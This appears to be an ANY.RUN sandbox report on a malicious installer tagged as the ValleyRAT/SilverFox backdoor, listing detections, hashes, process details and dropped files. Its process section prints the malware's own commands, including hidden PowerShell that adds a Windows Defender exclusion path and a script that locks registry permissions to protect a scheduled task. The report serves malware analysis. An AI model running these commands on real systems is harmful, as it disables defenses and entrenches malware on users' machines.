File name:

86CB5F74AF900C505A558DD1C9018BC4.exe

Full analysis: https://app.any.run/tasks/1554a9bb-b2fe-40e1-96dc-edba0a76a25c
Verdict: Malicious activity
Threats:

A backdoor is a type of cybersecurity threat that allows attackers to secretly compromise a system and conduct malicious activities, such as stealing data and modifying files. Backdoors can be difficult to detect, as they often use legitimate system applications to evade defense mechanisms. Threat actors often utilize special malware, such as PlugX, to establish backdoors on target devices.

Analysis date: July 26, 2025, 00:50:00
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
backdoor
silverfox
valleyrat
winos
rat
qrcode
vmprotect
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386, for MS Windows, 11 sections
MD5:

86CB5F74AF900C505A558DD1C9018BC4

SHA1:

B3398C70A2FC85FC80158C27AB30AC645E3BF4BF

SHA256:

F1BDE45AC4A34B8EC885FB5FB07F5E47F89F97B257CC38A1EB37FC0C308C4A04

SSDEEP:

393216:I3HVEhHibNch9XZPi9J5TieN6m1O41mtbSHNJWFCu:uIXZPlO1mtENJeD

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • SILVERFOX has been detected (SURICATA)

      • NtHandleCallback.exe (PID: 7044)
      • tracerpt.exe (PID: 888)
    • VALLEYRAT has been detected

      • NtHandleCallback.exe (PID: 7044)
    • Connects to the CnC server

      • NtHandleCallback.exe (PID: 7044)
      • tracerpt.exe (PID: 888)
    • Run PowerShell with an invisible window

      • powershell.exe (PID: 6980)
      • powershell.exe (PID: 7224)
      • powershell.exe (PID: 7292)
      • powershell.exe (PID: 7748)
      • powershell.exe (PID: 7968)
      • powershell.exe (PID: 8044)
      • powershell.exe (PID: 7424)
      • powershell.exe (PID: 7316)
      • powershell.exe (PID: 7228)
      • powershell.exe (PID: 2668)
      • powershell.exe (PID: 6656)
      • powershell.exe (PID: 4912)
      • powershell.exe (PID: 7284)
      • powershell.exe (PID: 6312)
      • powershell.exe (PID: 4456)
      • powershell.exe (PID: 2996)
      • powershell.exe (PID: 7876)
      • powershell.exe (PID: 3896)
      • powershell.exe (PID: 320)
      • powershell.exe (PID: 4080)
      • powershell.exe (PID: 2324)
      • powershell.exe (PID: 8080)
      • powershell.exe (PID: 3396)
      • powershell.exe (PID: 6684)
      • powershell.exe (PID: 8040)
      • powershell.exe (PID: 8472)
      • powershell.exe (PID: 9040)
      • powershell.exe (PID: 8276)
      • powershell.exe (PID: 8372)
      • powershell.exe (PID: 3768)
      • powershell.exe (PID: 9092)
      • powershell.exe (PID: 7848)
      • powershell.exe (PID: 8688)
      • powershell.exe (PID: 8228)
      • powershell.exe (PID: 3840)
      • powershell.exe (PID: 9152)
      • powershell.exe (PID: 5476)
      • powershell.exe (PID: 5928)
      • powershell.exe (PID: 6544)
      • powershell.exe (PID: 5288)
      • powershell.exe (PID: 8528)
      • powershell.exe (PID: 8624)
      • powershell.exe (PID: 6288)
      • powershell.exe (PID: 8592)
      • powershell.exe (PID: 8948)
      • powershell.exe (PID: 6648)
      • powershell.exe (PID: 9160)
      • powershell.exe (PID: 9212)
    • Bypass execution policy to execute commands

      • powershell.exe (PID: 7224)
      • powershell.exe (PID: 7968)
      • powershell.exe (PID: 7228)
      • powershell.exe (PID: 2668)
      • powershell.exe (PID: 6312)
      • powershell.exe (PID: 4456)
      • powershell.exe (PID: 320)
      • powershell.exe (PID: 3396)
      • powershell.exe (PID: 8276)
      • powershell.exe (PID: 8688)
      • powershell.exe (PID: 9092)
      • powershell.exe (PID: 8228)
      • powershell.exe (PID: 8624)
      • powershell.exe (PID: 8528)
      • powershell.exe (PID: 6288)
      • powershell.exe (PID: 6648)
    • Changes Windows Defender settings

      • NtHandleCallback.exe (PID: 7044)
    • Adds path to the Windows Defender exclusion list

      • NtHandleCallback.exe (PID: 7044)
    • Changes powershell execution policy (Bypass)

      • NtHandleCallback.exe (PID: 7044)
    • VALLEYRAT has been detected (YARA)

      • NtHandleCallback.exe (PID: 7044)
    • WINOS has been detected (YARA)

      • tracerpt.exe (PID: 888)
  • SUSPICIOUS

    • Reads security settings of Internet Explorer

      • 86CB5F74AF900C505A558DD1C9018BC4.tmp (PID: 6264)
      • updater.exe (PID: 6504)
    • Executable content was dropped or overwritten

      • 86CB5F74AF900C505A558DD1C9018BC4.exe (PID: 6720)
      • 86CB5F74AF900C505A558DD1C9018BC4.exe (PID: 4104)
      • 86CB5F74AF900C505A558DD1C9018BC4.tmp (PID: 6704)
      • unzip.exe (PID: 3108)
      • updater.exe (PID: 6504)
      • updater.exe (PID: 2508)
      • men.exe (PID: 5628)
      • NtHandleCallback.exe (PID: 7044)
      • NVIDIA.exe (PID: 188)
      • 138.0.7204.169_chrome_installer_uncompressed.exe (PID: 4400)
      • setup.exe (PID: 7852)
      • updater.exe (PID: 7468)
      • updater.exe (PID: 8464)
    • Reads the Windows owner or organization settings

      • 86CB5F74AF900C505A558DD1C9018BC4.tmp (PID: 6704)
    • Likely accesses (executes) a file from the Public directory

      • setup.exe (PID: 472)
      • unzip.exe (PID: 3108)
      • men.exe (PID: 5628)
      • NtHandleCallback.exe (PID: 7044)
      • NVIDIA.exe (PID: 188)
      • powershell.exe (PID: 7224)
      • powershell.exe (PID: 7968)
      • powershell.exe (PID: 7228)
      • powershell.exe (PID: 2668)
      • sc.exe (PID: 7936)
      • main.exe (PID: 7864)
      • main.exe (PID: 7872)
      • cmd.exe (PID: 2972)
      • powershell.exe (PID: 6312)
      • powershell.exe (PID: 4456)
      • powershell.exe (PID: 320)
      • powershell.exe (PID: 3396)
      • powershell.exe (PID: 8276)
      • powershell.exe (PID: 9092)
      • powershell.exe (PID: 8688)
      • powershell.exe (PID: 8228)
      • powershell.exe (PID: 8528)
      • powershell.exe (PID: 8624)
      • powershell.exe (PID: 6648)
      • powershell.exe (PID: 6288)
    • Creates file in the system drive root

      • 86CB5F74AF900C505A558DD1C9018BC4.tmp (PID: 6704)
      • NtHandleCallback.exe (PID: 7044)
    • Application launched itself

      • updater.exe (PID: 6504)
      • updater.exe (PID: 2508)
      • updater.exe (PID: 6648)
      • setup.exe (PID: 7852)
      • setup.exe (PID: 7600)
      • updater.exe (PID: 7468)
      • updater.exe (PID: 8464)
    • Executes as Windows Service

      • updater.exe (PID: 2508)
      • updater.exe (PID: 6648)
      • updater.exe (PID: 7468)
    • Drops 7-zip archiver for unpacking

      • men.exe (PID: 5628)
    • Drops a system driver (possible attempt to evade defenses)

      • NtHandleCallback.exe (PID: 7044)
      • men.exe (PID: 5628)
    • Connects to unusual port

      • NtHandleCallback.exe (PID: 7044)
      • tracerpt.exe (PID: 888)
    • Contacting a server suspected of hosting a CnC

      • NtHandleCallback.exe (PID: 7044)
      • tracerpt.exe (PID: 888)
    • Query Microsoft Defender preferences

      • NtHandleCallback.exe (PID: 7044)
    • Creates or modifies Windows services

      • NVIDIA.exe (PID: 188)
    • Script adds exclusion path to Windows Defender

      • NtHandleCallback.exe (PID: 7044)
    • Starts POWERSHELL.EXE for commands execution

      • NtHandleCallback.exe (PID: 7044)
      • men.exe (PID: 5628)
    • The process bypasses the loading of PowerShell profile settings

      • NtHandleCallback.exe (PID: 7044)
    • Windows service management via SC.EXE

      • sc.exe (PID: 7848)
    • Creates a new Windows service

      • sc.exe (PID: 7936)
    • Starts SC.EXE for service management

      • men.exe (PID: 5628)
    • Stops a currently running service

      • sc.exe (PID: 7892)
    • Takes ownership (TAKEOWN.EXE)

      • cmd.exe (PID: 7788)
    • Uses ICACLS.EXE to modify access control lists

      • cmd.exe (PID: 7788)
    • Executing commands from a ".bat" file

      • men.exe (PID: 5628)
    • The process deletes folder without confirmation

      • men.exe (PID: 5628)
    • Starts CMD.EXE for commands execution

      • men.exe (PID: 5628)
    • Hides command output

      • cmd.exe (PID: 7788)
    • There is functionality for taking screenshot (YARA)

      • tracerpt.exe (PID: 888)
  • INFO

    • Create files in a temporary directory

      • 86CB5F74AF900C505A558DD1C9018BC4.exe (PID: 6720)
      • 86CB5F74AF900C505A558DD1C9018BC4.exe (PID: 4104)
      • 86CB5F74AF900C505A558DD1C9018BC4.tmp (PID: 6704)
      • setup.exe (PID: 472)
      • updater.exe (PID: 6504)
      • NVIDIA.exe (PID: 188)
    • Checks supported languages

      • 86CB5F74AF900C505A558DD1C9018BC4.exe (PID: 6720)
      • 86CB5F74AF900C505A558DD1C9018BC4.tmp (PID: 6264)
      • 86CB5F74AF900C505A558DD1C9018BC4.exe (PID: 4104)
      • 86CB5F74AF900C505A558DD1C9018BC4.tmp (PID: 6704)
      • setup.exe (PID: 472)
      • unzip.exe (PID: 3108)
      • updater.exe (PID: 6504)
      • men.exe (PID: 5628)
      • updater.exe (PID: 1180)
      • updater.exe (PID: 1160)
      • updater.exe (PID: 2508)
      • NtHandleCallback.exe (PID: 7044)
      • updater.exe (PID: 3740)
      • updater.exe (PID: 6648)
      • NVIDIA.exe (PID: 188)
      • 138.0.7204.169_chrome_installer_uncompressed.exe (PID: 4400)
      • main.exe (PID: 7864)
      • main.exe (PID: 7872)
    • Process checks computer location settings

      • 86CB5F74AF900C505A558DD1C9018BC4.tmp (PID: 6264)
    • Reads the computer name

      • 86CB5F74AF900C505A558DD1C9018BC4.tmp (PID: 6264)
      • 86CB5F74AF900C505A558DD1C9018BC4.exe (PID: 4104)
      • 86CB5F74AF900C505A558DD1C9018BC4.tmp (PID: 6704)
      • unzip.exe (PID: 3108)
      • setup.exe (PID: 472)
      • updater.exe (PID: 6504)
      • updater.exe (PID: 2508)
      • men.exe (PID: 5628)
      • updater.exe (PID: 6648)
      • NtHandleCallback.exe (PID: 7044)
      • 138.0.7204.169_chrome_installer_uncompressed.exe (PID: 4400)
    • The sample compiled with English language support

      • 86CB5F74AF900C505A558DD1C9018BC4.tmp (PID: 6704)
      • updater.exe (PID: 2508)
      • updater.exe (PID: 6504)
      • men.exe (PID: 5628)
      • 138.0.7204.169_chrome_installer_uncompressed.exe (PID: 4400)
      • setup.exe (PID: 7852)
      • updater.exe (PID: 7468)
      • updater.exe (PID: 8464)
    • Creates files in the program directory

      • updater.exe (PID: 6504)
      • updater.exe (PID: 1180)
      • updater.exe (PID: 2508)
      • updater.exe (PID: 6648)
      • setup.exe (PID: 7852)
      • setup.exe (PID: 7600)
      • updater.exe (PID: 7468)
      • updater.exe (PID: 8516)
      • updater.exe (PID: 8464)
    • Process checks whether UAC notifications are on

      • updater.exe (PID: 6504)
      • updater.exe (PID: 2508)
      • updater.exe (PID: 6648)
    • Drops encrypted VBS script (Microsoft Script Encoder)

      • men.exe (PID: 5628)
    • Reads the software policy settings

      • updater.exe (PID: 6648)
      • updater.exe (PID: 6504)
    • Creates files or folders in the user directory

      • updater.exe (PID: 6504)
    • Checks proxy server information

      • updater.exe (PID: 6504)
    • Reads the machine GUID from the registry

      • updater.exe (PID: 6504)
    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 7224)
      • powershell.exe (PID: 6980)
      • powershell.exe (PID: 7292)
      • powershell.exe (PID: 7748)
      • powershell.exe (PID: 7424)
      • powershell.exe (PID: 7228)
      • powershell.exe (PID: 7968)
      • powershell.exe (PID: 8044)
      • powershell.exe (PID: 7316)
      • powershell.exe (PID: 4912)
      • powershell.exe (PID: 2668)
      • powershell.exe (PID: 6656)
      • powershell.exe (PID: 7284)
      • powershell.exe (PID: 6312)
      • powershell.exe (PID: 2996)
      • powershell.exe (PID: 768)
      • powershell.exe (PID: 7876)
      • powershell.exe (PID: 3896)
      • powershell.exe (PID: 4456)
      • powershell.exe (PID: 4080)
      • powershell.exe (PID: 2324)
      • powershell.exe (PID: 320)
      • powershell.exe (PID: 3396)
      • powershell.exe (PID: 8040)
      • powershell.exe (PID: 8080)
      • powershell.exe (PID: 6684)
      • powershell.exe (PID: 8276)
      • powershell.exe (PID: 8472)
      • powershell.exe (PID: 9040)
      • powershell.exe (PID: 8688)
      • powershell.exe (PID: 8372)
      • powershell.exe (PID: 3768)
      • powershell.exe (PID: 9092)
      • powershell.exe (PID: 8228)
      • powershell.exe (PID: 3840)
      • powershell.exe (PID: 9152)
      • powershell.exe (PID: 7848)
      • powershell.exe (PID: 5476)
      • powershell.exe (PID: 5928)
      • powershell.exe (PID: 5288)
      • powershell.exe (PID: 8528)
      • powershell.exe (PID: 8624)
      • powershell.exe (PID: 8592)
      • powershell.exe (PID: 6288)
      • powershell.exe (PID: 6544)
      • powershell.exe (PID: 9160)
      • powershell.exe (PID: 8948)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 6980)
      • powershell.exe (PID: 7224)
      • powershell.exe (PID: 7292)
      • powershell.exe (PID: 7748)
      • powershell.exe (PID: 7228)
      • powershell.exe (PID: 7424)
      • powershell.exe (PID: 7968)
      • powershell.exe (PID: 8044)
      • powershell.exe (PID: 7316)
      • powershell.exe (PID: 4912)
      • powershell.exe (PID: 2668)
      • powershell.exe (PID: 6656)
      • powershell.exe (PID: 7284)
      • powershell.exe (PID: 768)
      • powershell.exe (PID: 7876)
      • powershell.exe (PID: 6312)
      • powershell.exe (PID: 2996)
      • powershell.exe (PID: 4456)
      • powershell.exe (PID: 3896)
      • powershell.exe (PID: 4080)
      • powershell.exe (PID: 320)
      • powershell.exe (PID: 2324)
      • powershell.exe (PID: 8080)
      • powershell.exe (PID: 3396)
      • powershell.exe (PID: 6684)
      • powershell.exe (PID: 8040)
      • powershell.exe (PID: 8276)
      • powershell.exe (PID: 8472)
      • powershell.exe (PID: 9040)
      • powershell.exe (PID: 8688)
      • powershell.exe (PID: 8372)
      • powershell.exe (PID: 3768)
      • powershell.exe (PID: 5476)
      • powershell.exe (PID: 8228)
      • powershell.exe (PID: 3840)
      • powershell.exe (PID: 9152)
      • powershell.exe (PID: 9092)
      • powershell.exe (PID: 7848)
      • powershell.exe (PID: 8624)
      • powershell.exe (PID: 5928)
      • powershell.exe (PID: 5288)
      • powershell.exe (PID: 8528)
      • powershell.exe (PID: 6288)
      • powershell.exe (PID: 8592)
      • powershell.exe (PID: 8948)
      • powershell.exe (PID: 6544)
      • powershell.exe (PID: 9160)
    • The sample compiled with Chinese language support

      • NVIDIA.exe (PID: 188)
    • VMProtect protector has been detected

      • men.exe (PID: 5628)
    • Manual execution by a user

      • chrome.exe (PID: 2212)
      • msedge.exe (PID: 3704)
      • msedge.exe (PID: 9096)
    • Application launched itself

      • chrome.exe (PID: 2212)
      • msedge.exe (PID: 3704)
    • Executes as Windows Service

      • elevation_service.exe (PID: 5172)
    • Connects to unusual port

      • chrome.exe (PID: 6876)
No Malware configuration.

TRiD

.exe | Inno Setup installer (67.7)
.exe | Win32 EXE PECompact compressed (generic) (25.6)
.exe | Win32 Executable (generic) (2.7)
.exe | Win16/32 Executable Delphi generic (1.2)
.exe | Generic Win/DOS Executable (1.2)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2025:05:10 14:35:33+00:00
ImageFileCharacteristics: Executable, 32-bit
PEType: PE32
LinkerVersion: 2.25
CodeSize: 704512
InitializedDataSize: 230400
UninitializedDataSize: -
EntryPoint: 0xacfe0
OSVersion: 6.1
ImageVersion: -
SubsystemVersion: 6.1
Subsystem: Windows GUI
FileVersionNumber: 70.0.3538.110
ProductVersionNumber: 70.0.3538.110
FileFlagsMask: 0x003f
FileFlags: (none)
FileOS: Win32
ObjectFileType: Executable application
FileSubtype: -
LanguageCode: Neutral
CharacterSet: Unicode
Comments: This installation was built with Inno Setup.
CompanyName:
FileDescription: X Setup
FileVersion: 70.0.3538.110
LegalCopyright:
OriginalFileName:
ProductName: X
ProductVersion: 70.0.3538.110
No data.
Total processes
354
Monitored processes
214
Malicious processes
7
Suspicious processes
20

Behavior graph

Graph nodes (flattened from the interactive graph, listed in display order; "#SILVERFOX" marks nodes the sandbox tagged with that signature, "no specs" marks nodes with no signature hits; parent/child edges are not recoverable from the flattened text, see Process information): start → 86cb5f74af900c505a558dd1c9018bc4.exe, 86cb5f74af900c505a558dd1c9018bc4.tmp, setup.exe, unzip.exe, conhost.exe, updater.exe, men.exe, nthandlecallback.exe (#SILVERFOX), powershell.exe, tracerpt.exe (#SILVERFOX), nvidia.exe, svchost.exe, 138.0.7204.169_chrome_installer_uncompressed.exe, sc.exe, main.exe, cmd.exe, takeown.exe, icacls.exe, chrome.exe, slui.exe, elevation_service.exe, msedge.exe, updatersetup.exe, identity_helper.exe. powershell.exe, conhost.exe, chrome.exe and msedge.exe each appear many times in the graph.

Process information

PID
CMD
Path
Indicators
Parent process
PID:
188
CMD:
C:\Users\Public\Documents\WindowsData\NVIDIA.exe
Path:
C:\Users\Public\Documents\WindowsData\NVIDIA.exe
Parent process:
NtHandleCallback.exe
User:
admin
Integrity Level:
HIGH
Modules
Images
c:\users\public\documents\windowsdata\nvidia.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
PID:
320
CMD:
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "if ((Get-MpPreference).ExclusionPath -notcontains 'C:\\Users\\Public\\Documents') { Add-MpPreference -ExclusionPath 'C:\\Users\\Public\\Documents' }"
Path:
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Parent process:
NtHandleCallback.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
PID:
432
CMD:
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --disable-quic --force-high-res-timeticks=disabled --field-trial-handle=1956,i,13606244526344788668,10843493448230002564,262144 --variations-seed-version --mojo-platform-channel-handle=6824 /prefetch:8
Path:
C:\Program Files\Google\Chrome\Application\chrome.exe
Parent process:
chrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
LOW
Description:
Google Chrome
Exit code:
0
Version:
138.0.7204.169
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\138.0.7204.169\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
PID:
440
CMD:
\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path:
C:\Windows\System32\conhost.exe
Parent process:
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID:
472
CMD:
"C:\Users\Public\Documents\setup.exe"
Path:
C:\Users\Public\Documents\setup.exe
Parent process:
86CB5F74AF900C505A558DD1C9018BC4.tmp
User:
admin
Company:
Google LLC
Integrity Level:
HIGH
Description:
Google Installer (x86)
Exit code:
0
Version:
140.0.7272.0
Modules
Images
c:\users\public\documents\setup.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\acgenral.dll
PID:
768
CMD:
powershell -Command "$regPath = 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\WindowsPowerShell.WbemScripting.SWbemLocator'; $acl = (Get-Item -Path $regPath).GetAccessControl(); $acl.SetAccessRuleProtection($true,$false); $acl.Access | ForEach-Object { $acl.RemoveAccessRule($_); }; $sidSystem = New-Object System.Security.Principal.SecurityIdentifier('S-1-5-18'); $sidAdmins = New-Object System.Security.Principal.SecurityIdentifier('S-1-5-32-544'); $sidEveryone = New-Object System.Security.Principal.SecurityIdentifier('S-1-1-0'); $acl.AddAccessRule((New-Object System.Security.AccessControl.RegistryAccessRule($sidSystem,'FullControl','Allow'))); $acl.AddAccessRule((New-Object System.Security.AccessControl.RegistryAccessRule($sidAdmins,'ReadKey','Allow'))); $acl.AddAccessRule((New-Object System.Security.AccessControl.RegistryAccessRule($sidEveryone,'Delete','Deny'))); (Get-Item -Path $regPath).SetAccessControl($acl); Disable-ScheduledTask -TaskName 'WindowsPowerShell.WbemScripting.SWbemLocator' >$null; Write-Host '计划任务保护已成功应用且不可删除' -ForegroundColor Green;"
Path:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process:
men.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
PID:
868
CMD:
icacls "C:\Windows\System32\Tasks\WindowsPowerShell.WbemScripting.SWbemLocator" /grant Administrators:F
Path:
C:\Windows\System32\icacls.exe
Parent process:
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\icacls.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
PID:
888
CMD:
"C:\Windows\SysWOW64\tracerpt.exe"
Path:
C:\Windows\SysWOW64\tracerpt.exe
Parent process:
NtHandleCallback.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Event Trace Report Tool
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\tracerpt.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
PID:
952
CMD:
\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path:
C:\Windows\System32\conhost.exe
Parent process:
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID:
1096
CMD:
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=138.0.7204.169 --initial-client-data=0x224,0x228,0x22c,0x200,0x230,0x7ffc3cc596e8,0x7ffc3cc596f4,0x7ffc3cc59700
Path:
C:\Program Files\Google\Chrome\Application\chrome.exe
Parent process:
chrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
MEDIUM
Description:
Google Chrome
Version:
138.0.7204.169
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\aclayers.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
Total events
63 182
Read events
63 066
Write events
105
Delete events
11

Modification events

(PID) Process: (6504) updater.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Google\Update\Clients\{44fc7fe2-65ce-487c-93f4-edee46eeaaab}
Operation: write
Name: pv
Value: 140.0.7272.0

(PID) Process: (6504) updater.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Google\Update\Clients\{44fc7fe2-65ce-487c-93f4-edee46eeaaab}
Operation: write
Name: name
Value: GoogleUpdater

(PID) Process: (6504) updater.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Google\Update\ClientState\{44fc7fe2-65ce-487c-93f4-edee46eeaaab}
Operation: write
Name: pv
Value: 140.0.7272.0

(PID) Process: (6504) updater.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Google\Update\ClientState\{44fc7fe2-65ce-487c-93f4-edee46eeaaab}
Operation: write
Name: name
Value: GoogleUpdater

(PID) Process: (6504) updater.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20510F28-2A48-5A0C-B29F-D8150AF90AF8}
Operation: write
Name: AppID
Value: {20510F28-2A48-5A0C-B29F-D8150AF90AF8}

(PID) Process: (6504) updater.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{20510F28-2A48-5A0C-B29F-D8150AF90AF8}
Operation: write
Name: LocalService
Value: GoogleUpdaterInternalService140.0.7272.0

(PID) Process: (6504) updater.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{20510F28-2A48-5A0C-B29F-D8150AF90AF8}
Operation: write
Name: ServiceParameters
Value: --com-service

(PID) Process: (6504) updater.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{688BD533-FF4B-5424-ADB1-295B5C987389}\TypeLib
Operation: write
Name: Version
Value: 1.0

(PID) Process: (6504) updater.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{688BD533-FF4B-5424-ADB1-295B5C987389}\TypeLib
Operation: write
Name: Version
Value: 1.0

(PID) Process: (6504) updater.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{90A9770C-7287-5249-B78F-263562CAE1FD}\TypeLib
Operation: write
Name: Version
Value: 1.0
Executable files
36
Suspicious files
483
Text files
309
Unknown types
1

Dropped files

PID: 6704
Process: 86CB5F74AF900C505A558DD1C9018BC4.tmp
Filename: C:\Users\Public\Documents\is-A6JN4.tmp
Type:
MD5:
SHA256:

PID: 6704
Process: 86CB5F74AF900C505A558DD1C9018BC4.tmp
Filename: C:\Users\Public\Documents\man.dat
Type:
MD5:
SHA256:

PID: 472
Process: setup.exe
Filename: C:\Users\admin\AppData\Local\Temp\Google472_484684920\UPDATER.PACKED.7Z
Type:
MD5:
SHA256:

PID: 5628
Process: men.exe
Filename: C:\Users\Public\Documents\WindowsData\bypass.exe
Type: executable
MD5: B423CAF761DF91BA457D3FD6C747E4AA
SHA256: F330E21CF670DA67160937525DD5CA80B1F26C9B3DDDD34ADB2F175D85C485F1

PID: 6704
Process: 86CB5F74AF900C505A558DD1C9018BC4.tmp
Filename: C:\Users\Public\Documents\is-0FQEL.tmp
Type: executable
MD5: 3E80E94FC193E8B73D87ADF328ADD5E4
SHA256: 96FD836BCD39DE9F57496000A72EEB1163A2A0817E3F814E4212D0ACC93C2736

PID: 5628
Process: men.exe
Filename: C:\Users\Public\Documents\WindowsData\me.key
Type: compressed
MD5: D6BF6CCC1882FF0CA93670B3EB0FB10A
SHA256: 5EEEF5659BD2CB872D3D41064A2B295B5876EBE53073A95F46796C68913DB8D5

PID: 5628
Process: men.exe
Filename: C:\Users\Public\Documents\WindowsData\X.vbe
Type: binary
MD5: 04264646287BB028AD5280CF4DA39358
SHA256: 73526196AC0F863BD46F1BD0653CE42C429064E24FAF2AD917FF935E9BBDFFB5

PID: 5628
Process: men.exe
Filename: C:\Users\Public\Documents\WindowsData\NVIDIA.exe
Type: executable
MD5: 2B45A9511BFE6FD4E61A6C7071FA0B60
SHA256: A411F96323035EDBBE3468D854B161F83CC5A0FA948CEFF524BF82B5FF1C0521

PID: 3108
Process: unzip.exe
